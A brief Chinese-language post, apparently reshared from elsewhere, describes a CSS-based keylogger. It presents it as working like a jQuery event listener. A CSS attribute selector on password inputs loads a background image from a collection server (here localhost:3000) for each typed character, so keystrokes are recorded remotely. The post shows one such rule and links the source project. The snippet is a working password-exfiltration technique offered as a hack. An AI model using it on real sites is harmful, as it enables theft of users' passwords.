类似JQuery的事件监听器
通过监听输入类型为password的输入框,判断捕捉键入的字母,加载对应的背景图,实现远程键盘记录。

input[type="password"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}

项目地址:https://github.com/maxchehab/CSS-Keylogging

源链接

Hacking more

...